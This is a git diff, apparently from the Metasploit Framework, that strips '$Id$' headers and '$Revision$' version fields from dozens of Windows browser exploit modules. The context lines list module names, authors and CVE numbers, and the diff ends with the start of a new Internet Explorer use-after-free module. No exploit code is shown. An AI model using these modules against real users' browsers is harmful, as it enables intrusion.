0d8f1a9b8d..c1c6dc6ed2 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -39,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Unknown', # Found being openly exploited 'jduck' # Metasploit version ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2010-1297'], diff --git a/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb b/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb index 379287a8dd..e315a25410 100644 --- a/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb +++ b/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck', 'jabra' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3459' ], diff --git a/modules/exploits/windows/browser/adobe_geticon.rb b/modules/exploits/windows/browser/adobe_geticon.rb index eaab78f267..bf2d510125 100644 --- a/modules/exploits/windows/browser/adobe_geticon.rb +++ b/modules/exploits/windows/browser/adobe_geticon.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Didier Stevens ', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0927' ], diff --git a/modules/exploits/windows/browser/adobe_jbig2decode.rb b/modules/exploits/windows/browser/adobe_jbig2decode.rb index 45303d6cd3..f6e2e55e2a 100644 --- a/modules/exploits/windows/browser/adobe_jbig2decode.rb +++ b/modules/exploits/windows/browser/adobe_jbig2decode.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote # obfuscation techniques and pdf template from util_printf 'MC', 'Didier Stevens ', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE' , '2009-0658' ], diff --git a/modules/exploits/windows/browser/adobe_media_newplayer.rb b/modules/exploits/windows/browser/adobe_media_newplayer.rb index e792e38b4f..fa9206a9ea 100644 --- a/modules/exploits/windows/browser/adobe_media_newplayer.rb +++ b/modules/exploits/windows/browser/adobe_media_newplayer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck', 'jabra' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4324' ], diff --git a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb index 8f06ee14df..0dcce3dac8 100644 --- a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb +++ b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'David Kennedy "ReL1K" '], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-3653'], diff --git a/modules/exploits/windows/browser/adobe_utilprintf.rb b/modules/exploits/windows/browser/adobe_utilprintf.rb index 61a08cd261..daa246977f 100644 --- a/modules/exploits/windows/browser/adobe_utilprintf.rb +++ b/modules/exploits/windows/browser/adobe_utilprintf.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC', 'Didier Stevens ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-2992' ], diff --git a/modules/exploits/windows/browser/aim_goaway.rb b/modules/exploits/windows/browser/aim_goaway.rb index 32a71920fe..e71d8ed0ac 100644 --- a/modules/exploits/windows/browser/aim_goaway.rb +++ b/modules/exploits/windows/browser/aim_goaway.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -36,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'skape', 'thief ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0636' ], diff --git a/modules/exploits/windows/browser/amaya_bdo.rb b/modules/exploits/windows/browser/amaya_bdo.rb index 3fa7f03d22..86657c7b90 100644 --- a/modules/exploits/windows/browser/amaya_bdo.rb +++ b/modules/exploits/windows/browser/amaya_bdo.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'dookie, original exploit by Rob Carter' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0323' ], diff --git a/modules/exploits/windows/browser/aol_ampx_convertfile.rb b/modules/exploits/windows/browser/aol_ampx_convertfile.rb index 21daa6416d..9c37381e18 100644 --- a/modules/exploits/windows/browser/aol_ampx_convertfile.rb +++ b/modules/exploits/windows/browser/aol_ampx_convertfile.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'rgod ', # Original exploit [see References] 'Trancer ' # Metasploit implementation ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '54706' ], diff --git a/modules/exploits/windows/browser/aol_icq_downloadagent.rb b/modules/exploits/windows/browser/aol_icq_downloadagent.rb index bf5a841ca2..d6fa08af19 100644 --- a/modules/exploits/windows/browser/aol_icq_downloadagent.rb +++ b/modules/exploits/windows/browser/aol_icq_downloadagent.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-5650' ], diff --git a/modules/exploits/windows/browser/apple_itunes_playlist.rb b/modules/exploits/windows/browser/apple_itunes_playlist.rb index dae52efd67..52a2ab5487 100644 --- a/modules/exploits/windows/browser/apple_itunes_playlist.rb +++ b/modules/exploits/windows/browser/apple_itunes_playlist.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0043' ], diff --git a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb index 8e19dbfa1c..04ac60ecae 100644 --- a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb +++ b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -47,7 +43,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1818' ], diff --git a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb index 5f1e6bb39e..ecaae6bbc7 100644 --- a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb +++ b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -37,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'egypt' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-0015' ], diff --git a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb index ffcb83b511..6ac63df452 100644 --- a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb +++ b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -39,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1799' ], diff --git a/modules/exploits/windows/browser/ask_shortformat.rb b/modules/exploits/windows/browser/ask_shortformat.rb index 07e1cedd6e..a993cd2897 100644 --- a/modules/exploits/windows/browser/ask_shortformat.rb +++ b/modules/exploits/windows/browser/ask_shortformat.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5107' ], diff --git a/modules/exploits/windows/browser/athocgov_completeinstallation.rb b/modules/exploits/windows/browser/athocgov_completeinstallation.rb index 25854225a3..f673b54b77 100644 --- a/modules/exploits/windows/browser/athocgov_completeinstallation.rb +++ b/modules/exploits/windows/browser/athocgov_completeinstallation.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.athoc.com/products/IWSAlerts_overview.aspx' ] diff --git a/modules/exploits/windows/browser/autodesk_idrop.rb b/modules/exploits/windows/browser/autodesk_idrop.rb index 2f7fe92ccd..fb13f49e1a 100644 --- a/modules/exploits/windows/browser/autodesk_idrop.rb +++ b/modules/exploits/windows/browser/autodesk_idrop.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Elazar Broad ', # Original exploit [see References] 'Trancer ' # Metasploit implementation ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '53265' ], diff --git a/modules/exploits/windows/browser/aventail_epi_activex.rb b/modules/exploits/windows/browser/aventail_epi_activex.rb index 6532588ea8..8dd1dfc20f 100644 --- a/modules/exploits/windows/browser/aventail_epi_activex.rb +++ b/modules/exploits/windows/browser/aventail_epi_activex.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -47,7 +43,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Nikolas Sotiriu', # original discovery / poc 'jduck' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '67286'], diff --git a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb index 1c710c2cd0..edf70d1c0c 100644 --- a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb +++ b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -51,7 +47,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Trancer ', # Metasploit implementation 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4588' ], diff --git a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb index d0e9086ad9..85fdfe7daa 100644 --- a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb +++ b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'jduck' # original discovery & metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4850' ], diff --git a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb index b94ab916d5..f9d0ae766f 100644 --- a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb +++ b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1612' ], diff --git a/modules/exploits/windows/browser/barcode_ax49.rb b/modules/exploits/windows/browser/barcode_ax49.rb index dc30d37e03..cc332720bc 100644 --- a/modules/exploits/windows/browser/barcode_ax49.rb +++ b/modules/exploits/windows/browser/barcode_ax49.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancek ', 'patrick' ], - 'Version' => '$Revision$', 'References' => [ [ 'EDB', '4094' ], diff --git a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb index 9d3c103e3d..2954843631 100644 --- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb +++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -47,7 +43,6 @@ class Metasploit3 < Msf::Exploit::Remote 'mr_me ', # msf 'sinn3r' # wbemexec tekniq ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-2683'], diff --git a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb index de154ba864..0b1776245e 100644 --- a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb +++ b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'dean ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1472' ], diff --git a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb index d32fbd3d58..4850b59b1a 100644 --- a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb +++ b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'shinnai', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5002' ], diff --git a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb index 865eb0f1c8..7c9a5b2f8b 100644 --- a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb +++ b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'bannedit' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-2039' ], diff --git a/modules/exploits/windows/browser/citrix_gateway_actx.rb b/modules/exploits/windows/browser/citrix_gateway_actx.rb index c8697b0b7a..68d0d03894 100644 --- a/modules/exploits/windows/browser/citrix_gateway_actx.rb +++ b/modules/exploits/windows/browser/citrix_gateway_actx.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'bannedit', 'sinn3r', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-2882'], diff --git a/modules/exploits/windows/browser/communicrypt_mail_activex.rb b/modules/exploits/windows/browser/communicrypt_mail_activex.rb index a5ae172ff2..5ca97d58be 100644 --- a/modules/exploits/windows/browser/communicrypt_mail_activex.rb +++ b/modules/exploits/windows/browser/communicrypt_mail_activex.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Lincoln', # Original exploit author 'dookie' # MSF module author ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '64839' ], diff --git a/modules/exploits/windows/browser/creative_software_cachefolder.rb b/modules/exploits/windows/browser/creative_software_cachefolder.rb index 766e4c6d8e..e83953ea9c 100644 --- a/modules/exploits/windows/browser/creative_software_cachefolder.rb +++ b/modules/exploits/windows/browser/creative_software_cachefolder.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0955' ], diff --git a/modules/exploits/windows/browser/dxstudio_player_exec.rb b/modules/exploits/windows/browser/dxstudio_player_exec.rb index 9e4206cb9c..b7803aa617 100644 --- a/modules/exploits/windows/browser/dxstudio_player_exec.rb +++ b/modules/exploits/windows/browser/dxstudio_player_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -38,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-2011' ], diff --git a/modules/exploits/windows/browser/ea_checkrequirements.rb b/modules/exploits/windows/browser/ea_checkrequirements.rb index ca31962c54..d5688a3fb7 100644 --- a/modules/exploits/windows/browser/ea_checkrequirements.rb +++ b/modules/exploits/windows/browser/ea_checkrequirements.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-4466' ], diff --git a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb index 2bc7353e7e..3d1431c534 100644 --- a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb +++ b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => BSD_LICENSE, 'Author' => [ 'LSO ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-2919' ], diff --git a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb index 1c5d02f04c..3ab60922af 100644 --- a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb +++ b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4830'], diff --git a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb index b62bfe5ecc..1a085cd4c3 100644 --- a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb +++ b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3605' ], diff --git a/modules/exploits/windows/browser/facebook_extractiptc.rb b/modules/exploits/windows/browser/facebook_extractiptc.rb index e98bcb89ee..810c2b64c8 100644 --- a/modules/exploits/windows/browser/facebook_extractiptc.rb +++ b/modules/exploits/windows/browser/facebook_extractiptc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5711' ], diff --git a/modules/exploits/windows/browser/gom_openurl.rb b/modules/exploits/windows/browser/gom_openurl.rb index 3c11959283..4cf734417d 100644 --- a/modules/exploits/windows/browser/gom_openurl.rb +++ b/modules/exploits/windows/browser/gom_openurl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5779'], diff --git a/modules/exploits/windows/browser/greendam_url.rb b/modules/exploits/windows/browser/greendam_url.rb index 4db92c7f7b..688e4c8eca 100644 --- a/modules/exploits/windows/browser/greendam_url.rb +++ b/modules/exploits/windows/browser/greendam_url.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -44,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer ' ], - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '55126'], diff --git a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb index 11b118f7e9..eede7ff55b 100644 --- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb +++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -38,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Andrea Micalizzi', # aka rgod original discovery 'juan vazquez', # Original Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-2404'], diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb index a56fb1b05c..7322dada72 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0492'], diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb b/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb index f9afda169b..c1fcd4c6d7 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-6530'], diff --git a/modules/exploits/windows/browser/hpmqc_progcolor.rb b/modules/exploits/windows/browser/hpmqc_progcolor.rb index 2b97fb2ac6..fdc32cd2fc 100644 --- a/modules/exploits/windows/browser/hpmqc_progcolor.rb +++ b/modules/exploits/windows/browser/hpmqc_progcolor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-1819' ], diff --git a/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb index d462b9b40f..2662c74205 100644 --- a/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb +++ b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Dz_attacker ', # original file format module 'jduck' # converted HttpServer module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0679' ], diff --git a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb index c6da6cc4a4..53e8633822 100644 --- a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb +++ b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,8 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', - 'References' => [ [ 'CVE', '2009-0215' ], diff --git a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb index d13793d3e9..03be2c5721 100644 --- a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb +++ b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Elazar Broad ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-4474' ], diff --git a/modules/exploits/windows/browser/ie_cbutton_uaf.rb b/modules/exploits/windows/browser/ie_cbutton_uaf.rb new file mode 100644 index 0000000000..8b36b5e4a2 --- /dev/null +++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb @@ -0,0 +1,393 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote 